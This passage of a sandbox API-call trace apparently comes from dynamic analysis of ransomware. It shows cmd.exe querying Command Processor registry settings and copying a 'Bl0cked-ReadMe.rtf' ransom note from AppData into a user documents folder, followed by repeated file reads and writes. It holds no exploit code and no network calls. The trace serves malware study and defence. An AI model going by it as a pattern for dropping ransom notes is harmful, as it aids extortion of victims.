lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x4, lpData=0x1aea00*=0x40, lpcbData=0x1ae9f8*=0x4) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: 
lpType=0x1ae9fc*=0x0, lpData=0x1aea00*=0x40, lpcbData=0x1ae9f8*=0x1000) returned 0x2 [0133.282] RegCloseKey (hKey=0x40) returned 0x0 [0133.282] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9f4 | out: phkResult=0x1ae9f4*=0x40) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x0, lpData=0x1aea00*=0x40, lpcbData=0x1ae9f8*=0x1000) returned 0x2 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x4, lpData=0x1aea00*=0x1, lpcbData=0x1ae9f8*=0x4) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x0, lpData=0x1aea00*=0x1, lpcbData=0x1ae9f8*=0x1000) returned 0x2 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x4, lpData=0x1aea00*=0x0, lpcbData=0x1ae9f8*=0x4) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x4, lpData=0x1aea00*=0x9, lpcbData=0x1ae9f8*=0x4) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x4, lpData=0x1aea00*=0x9, lpcbData=0x1ae9f8*=0x4) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x0, lpData=0x1aea00*=0x9, lpcbData=0x1ae9f8*=0x1000) 
returned 0x2 [0133.282] RegCloseKey (hKey=0x40) returned 0x0 [0133.283] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886367 [0133.283] srand (_Seed=0x5b886367) [0133.283] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0133.283] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0133.283] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.283] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0133.283] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.283] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.283] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.283] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0133.283] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0133.283] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0133.283] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0133.283] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0133.283] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0133.283] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0133.283] _wcsicmp (_String1="PROMPT", 
_String2="HIGHESTNUMANODENUMBER") returned 8 [0133.283] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0133.284] GetEnvironmentStringsW () returned 0x3a22e8* [0133.284] FreeEnvironmentStringsW (penv=0x3a22e8) returned 1 [0133.284] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.284] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.284] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0133.284] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0133.284] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0133.284] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0133.284] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0133.284] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0133.284] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0133.284] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0133.284] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af7c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.284] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af7c0, lpFilePart=0x1af7bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af7bc*="Desktop") returned 0x18 [0133.284] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0133.284] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af53c | out: lpFindFileData=0x1af53c) returned 0x3a0028 [0133.284] FindClose (in: hFindFile=0x3a0028 | out: hFindFile=0x3a0028) returned 1 [0133.284] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af53c | out: lpFindFileData=0x1af53c) returned 0x3a0028 [0133.284] FindClose (in: hFindFile=0x3a0028 | out: 
hFindFile=0x3a0028) returned 1 [0133.285] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af53c | out: lpFindFileData=0x1af53c) returned 0x3a0028 [0133.285] FindClose (in: hFindFile=0x3a0028 | out: hFindFile=0x3a0028) returned 1 [0133.285] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0133.285] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0133.285] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0133.285] GetEnvironmentStringsW () returned 0x3a2b08* [0133.285] FreeEnvironmentStringsW (penv=0x3a2b08) returned 1 [0133.285] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.285] GetConsoleOutputCP () returned 0x1b5 [0133.286] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.286] GetUserDefaultLCID () returned 0x409 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af900, cchData=128 | out: lpLCData="0") returned 2 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af900, cchData=128 | out: lpLCData="0") returned 2 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af900, cchData=128 | out: lpLCData="1") returned 2 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, 
lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0133.286] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0133.287] GetConsoleTitleW (in: lpConsoleTitle=0x3908f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.288] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0133.288] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0133.288] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0133.288] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0133.288] _wcsicmp (_String1="type", _String2=")") returned 75 [0133.288] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0133.289] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0133.289] _wcsicmp (_String1="IF", _String2="type") returned -11 [0133.289] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0133.289] _wcsicmp (_String1="REM", _String2="type") returned -2 [0133.289] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0133.292] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.292] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.292] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0133.292] GetFileType (hFile=0x7) returned 0x2 [0133.292] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0133.292] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1af7f8 | out: lpMode=0x1af7f8) returned 1 [0133.293] _dup (_FileHandle=1) returned 3 [0133.293] _close (_FileHandle=1) returned 0 [0133.293] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0133.293] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1af7c8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0133.294] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0133.294] GetConsoleTitleW (in: lpConsoleTitle=0x1af5f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.294] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0133.294] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0133.294] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0133.294] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0133.295] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.295] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1af15c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af15c) returned 0x390e90 [0133.296] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0133.296] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0133.296] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 
0x2020 [0133.296] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ae068, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0133.296] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0133.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.296] GetFileType (hFile=0x54) returned 0x1 [0133.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.296] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ae0c0 | out: lpFileSizeHigh=0x1ae0c0*=0x0) returned 0x1632 [0133.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.296] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.296] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.296] GetFileType (hFile=0x4c) returned 0x1 [0133.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.296] GetFileType (hFile=0x4c) returned 0x1 [0133.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.296] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.297] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.297] GetFileType (hFile=0x4c) returned 0x1 [0133.297] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.297] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, 
lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.297] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.297] GetFileType (hFile=0x4c) returned 0x1 [0133.297] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.297] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] GetFileType (hFile=0x4c) returned 0x1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] GetFileType (hFile=0x4c) returned 0x1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] GetFileType (hFile=0x4c) returned 0x1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] GetFileType (hFile=0x4c) returned 0x1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, 
lpOverlapped=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.298] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] GetFileType (hFile=0x4c) returned 0x1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] GetFileType (hFile=0x4c) returned 0x1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] GetFileType (hFile=0x4c) returned 0x1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] GetFileType (hFile=0x4c) returned 0x1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] GetFileType (hFile=0x4c) returned 0x1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] GetFileType (hFile=0x4c) returned 0x1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] GetFileType (hFile=0x4c) returned 0x1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] GetFileType (hFile=0x4c) returned 0x1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.299] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.299] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] GetFileType (hFile=0x4c) returned 0x1 [0133.299] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0133.299] GetFileType (hFile=0x4c) returned 0x1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] GetFileType (hFile=0x4c) returned 0x1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] GetFileType (hFile=0x4c) returned 0x1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] GetFileType (hFile=0x4c) returned 0x1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] GetFileType (hFile=0x4c) returned 0x1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0133.300] GetFileType (hFile=0x4c) returned 0x1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] GetFileType (hFile=0x4c) returned 0x1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.300] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.300] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] GetFileType (hFile=0x4c) returned 0x1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] GetFileType (hFile=0x4c) returned 0x1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] GetFileType (hFile=0x4c) returned 0x1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, 
